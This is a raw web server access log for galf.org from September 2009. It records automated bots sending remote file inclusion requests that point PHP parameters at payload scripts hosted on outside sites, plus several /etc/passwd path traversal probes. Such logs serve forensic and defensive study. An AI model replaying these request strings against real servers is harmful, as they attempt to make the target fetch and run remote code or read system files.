74.92.145.181 - - [20/Sep/2009:18:34:52 -0700] "GET /logs/access_090817.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
74.92.145.181 - - [20/Sep/2009:18:34:52 -0700] "GET /errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
74.92.145.181 - - [20/Sep/2009:18:34:52 -0700] "GET /logs/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
147.52.239.140 - - [20/Sep/2009:18:34:53 -0700] "GET /logs/access_090316.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
87.104.34.140 - - [20/Sep/2009:18:34:55 -0700] "GET /logs/access_090817.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.104.34.140 - - [20/Sep/2009:18:34:56 -0700] "GET /errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.104.34.140 - - [20/Sep/2009:18:34:56 -0700] "GET /logs/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.104.34.140 - - [20/Sep/2009:18:34:58 -0700] "GET /logs/access_090817.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.104.34.140 - - [20/Sep/2009:18:34:59 -0700] "GET /errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.104.34.140 - - [20/Sep/2009:18:34:59 -0700] "GET /logs/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.104.34.140 - - [20/Sep/2009:18:35:03 -0700] "GET /logs/access_090817.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.104.34.140 - - [20/Sep/2009:18:35:03 -0700] "GET /errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.104.34.140 - - [20/Sep/2009:18:35:03 -0700] "GET /logs/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
206.251.74.140 - - [20/Sep/2009:18:35:05 -0700] "GET /errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
210.9.225.61 - - [20/Sep/2009:18:35:05 -0700] "GET /logs/access_090803.log%20/index.php?sayfa=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:18:35:54 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:18:35:54 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:18:35:54 -0700] "GET /logs/access_090330.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
210.9.225.61 - - [20/Sep/2009:18:36:10 -0700] "GET /logs/access_090720.log%20/index.php?sayfa=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
147.52.239.140 - - [20/Sep/2009:18:36:21 -0700] "GET /logs/access_090316.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.galf.org"
65.246.128.22 - - [20/Sep/2009:18:36:24 -0700] "GET /logs/access_090316.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:18:36:32 -0700] "GET /logs/access_090706.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:18:36:39 -0700] "GET /Savant2_Plugin_options.php?mosConfig_absolute_path=%20family%20forumhttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "galf.org"
77.222.40.247 - - [20/Sep/2009:18:36:39 -0700] "GET /logs/Savant2_Plugin_options.php?mosConfig_absolute_path=%20family%20forumhttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "galf.org"
87.104.34.140 - - [20/Sep/2009:18:36:48 -0700] "GET /logs/access_090316.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
116.125.113.119 - - [20/Sep/2009:18:36:50 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
116.125.113.119 - - [20/Sep/2009:18:36:50 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
116.125.113.119 - - [20/Sep/2009:18:36:50 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.shinchang.es.kr/board///su/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
87.104.34.140 - - [20/Sep/2009:18:36:52 -0700] "GET /logs/access_090316.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.104.34.140 - - [20/Sep/2009:18:36:52 -0700] "GET /logs/access_090316.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.62.190.52 - - [20/Sep/2009:18:37:06 -0700] "GET /logs/access_090316.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
65.246.128.22 - - [20/Sep/2009:18:37:14 -0700] "GET /errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:18:38:06 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:18:38:06 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:18:38:06 -0700] "GET /logs/access_090302.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:18:38:06 -0700] "GET /logs/access.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.92.145.181 - - [20/Sep/2009:18:38:34 -0700] "GET /errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
87.104.34.140 - - [20/Sep/2009:18:39:01 -0700] "GET /errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.104.34.140 - - [20/Sep/2009:18:39:06 -0700] "GET /errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.62.190.52 - - [20/Sep/2009:18:39:52 -0700] "GET /logs/access_090817.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.62.190.52 - - [20/Sep/2009:18:39:52 -0700] "GET /errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.62.190.52 - - [20/Sep/2009:18:39:52 -0700] "GET /logs/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.62.190.52 - - [20/Sep/2009:18:40:06 -0700] "GET /errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.62.190.52 - - [20/Sep/2009:18:41:03 -0700] "GET /logs/access_090316.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
210.205.6.233 - - [20/Sep/2009:18:41:37 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.4pppp.com//icon1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [20/Sep/2009:18:41:37 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.4pppp.com//icon1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [20/Sep/2009:18:41:37 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.4pppp.com//icon1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
87.104.34.140 - - [20/Sep/2009:18:44:35 -0700] "GET /errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
222.236.221.64 - - [20/Sep/2009:18:45:40 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.236.221.64 - - [20/Sep/2009:18:45:40 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.236.221.64 - - [20/Sep/2009:18:45:40 -0700] "GET /logs/access.log//bbs//skin/ggambo7002_board/write.php?dir=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
147.52.239.140 - - [20/Sep/2009:18:46:06 -0700] "GET /errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.galf.org"
65.55.207.123 - - [20/Sep/2009:18:48:39 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.207.123 - - [20/Sep/2009:18:51:20 -0700] "GET /tmp/?M=D HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.39.182.49 - - [20/Sep/2009:18:51:59 -0700] "GET /http://h1.ripway.com/zreg/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:18:52:49 -0700] "GET /logs/mambelfish.class.phpjoomla%20mambohttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:18:52:49 -0700] "GET /?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=%20http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:18:52:49 -0700] "GET /logs/?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=%20http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:18:52:49 -0700] "GET /mambelfish.class.phpjoomla%20mambohttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:18:52:50 -0700] "GET /?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=%20powered%202009http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:18:52:51 -0700] "GET /logs/?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=%20powered%202009http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
65.39.182.49 - - [20/Sep/2009:18:54:12 -0700] "GET /logs/access_090330.log/http://h1.ripway.com/zreg/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
65.39.182.49 - - [20/Sep/2009:18:54:12 -0700] "GET /http://h1.ripway.com/zreg/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
65.39.182.49 - - [20/Sep/2009:18:54:13 -0700] "GET /logs/http://h1.ripway.com/zreg/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:18:56:47 -0700] "GET /install.serverstat.php?mosConfig_absolute_path=%20family%20forumhttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
65.39.182.49 - - [20/Sep/2009:18:57:07 -0700] "GET /logs/access_090706.log/http://h1.ripway.com/zreg/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
72.11.145.8 - - [20/Sep/2009:19:00:24 -0700] "GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.wett-profis.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [20/Sep/2009:19:00:24 -0700] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.wett-profis.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [20/Sep/2009:19:00:24 -0700] "GET /logs/access_090413.log//accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.wett-profis.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [20/Sep/2009:19:01:02 -0700] "GET /logs/access_090406.log//accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.wett-profis.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.93.2.80 - - [20/Sep/2009:19:04:19 -0700] "GET /logs/homepage.php?sel=http://www.4pppp.com/icon1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.93.2.80 - - [20/Sep/2009:19:04:19 -0700] "GET /homepage.php?sel=http://www.4pppp.com/icon1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.93.2.80 - - [20/Sep/2009:19:04:19 -0700] "GET /logs/access_090608.log/homepage.php?sel=http://www.4pppp.com/icon1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:19:04:51 -0700] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:19:04:51 -0700] "GET /logs/access_090223.log%20%20//bbs/include/print_category.php?setup[use_category]=1&dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:19:04:54 -0700] "GET /logs/access_090622.log%20%20//bbs/include/print_category.php?setup[use_category]=1&dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.93.2.80 - - [20/Sep/2009:19:06:53 -0700] "GET /logs/access_090608.log%20%20/homepage.php?sel=http://www.4pppp.com/icon1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:19:07:49 -0700] "GET /bbs/include/print_category.php?setup[use_category]=1&dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:19:07:49 -0700] "GET /logs/access_090223.log%20%20//bbs/include/print_category.php?setup[use_category]=1&dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:19:07:49 -0700] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:19:08:01 -0700] "GET /logs/access_090622.log%20%20//bbs/include/print_category.php?setup[use_category]=1&dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:19:08:07 -0700] "GET /logs/game.php?dir=http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:19:08:08 -0700] "GET /game.php?dir=http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:19:11:30 -0700] "GET /admin.lurm_constructor.php?mosConfig_absolute_path=%20family%20forumhttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:19:11:30 -0700] "GET /logs/admin.lurm_constructor.php?mosConfig_absolute_path=%20family%20forumhttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
72.11.145.8 - - [20/Sep/2009:19:11:52 -0700] "GET /logs/access_090406.log%20%20//accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.wett-profis.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.142.221.158 - - [20/Sep/2009:19:15:29 -0700] "GET /logs/access_090302.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.freewebtown.com/ppkkssss/arroz/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.142.221.158 - - [20/Sep/2009:19:15:32 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.freewebtown.com/ppkkssss/arroz/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.142.221.158 - - [20/Sep/2009:19:15:32 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.freewebtown.com/ppkkssss/arroz/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.142.221.158 - - [20/Sep/2009:19:15:59 -0700] "GET /logs/access_090608.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.freewebtown.com/ppkkssss/arroz/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:19:21:27 -0700] "GET /help.mmp.phpjoomla%20mambohttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:19:21:27 -0700] "GET /logs/help.mmp.phpjoomla%20mambohttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:19:22:49 -0700] "GET /admin.a6mambocredits.php?mosConfig_absolute_path=%20joomla%20mambohttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:19:22:49 -0700] "GET /logs/admin.a6mambocredits.php?mosConfig_absolute_path=%20joomla%20mambohttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
202.142.221.158 - - [20/Sep/2009:19:26:13 -0700] "GET /logs/access_090420.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.freewebtown.com/ppkkssss/arroz/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.142.221.158 - - [20/Sep/2009:19:26:13 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.freewebtown.com/ppkkssss/arroz/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
202.142.221.158 - - [20/Sep/2009:19:26:13 -0700] "GET /logs/access.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.freewebtown.com/ppkkssss/arroz/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
202.142.221.158 - - [20/Sep/2009:19:26:13 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.freewebtown.com/ppkkssss/arroz/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
193.47.80.39 - - [20/Sep/2009:19:29:14 -0700] "GET /?N=D HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:19:31:22 -0700] "GET /?option=com_flyspray&Itemid=&mosConfig_absolute_path=%20http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:19:31:23 -0700] "GET /logs/?option=com_flyspray&Itemid=&mosConfig_absolute_path=%20http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:19:32:51 -0700] "GET /toolbar.phpshop.html.php?mosConfig_absolute_path=%20family%20forumhttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:19:32:51 -0700] "GET /logs/toolbar.phpshop.html.php?mosConfig_absolute_path=%20family%20forumhttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:19:34:58 -0700] "GET /logs/?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=%20powered%202009http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:19:34:59 -0700] "GET /?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=%20powered%202009http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
213.165.83.144 - - [20/Sep/2009:19:35:09 -0700] "GET /logs/access_090511.log//include/lib.inc.php?site_path=http://pyungan.or.kr/bbs/.injek/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.165.83.144 - - [20/Sep/2009:19:35:09 -0700] "GET /logs//include/lib.inc.php?site_path=http://pyungan.or.kr/bbs/.injek/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.165.83.144 - - [20/Sep/2009:19:35:09 -0700] "GET /include/lib.inc.php?site_path=http://pyungan.or.kr/bbs/.injek/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:19:39:39 -0700] "GET /uhp_config.phpjoomla%20mambohttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:19:39:39 -0700] "GET /logs/uhp_config.phpjoomla%20mambohttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:19:45:08 -0700] "GET /logs/?place=%20shophttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:19:45:08 -0700] "GET /?place=%20shophttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:19:48:08 -0700] "GET /mambatstaff.phpjoomla%20mambohttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "galf.org"
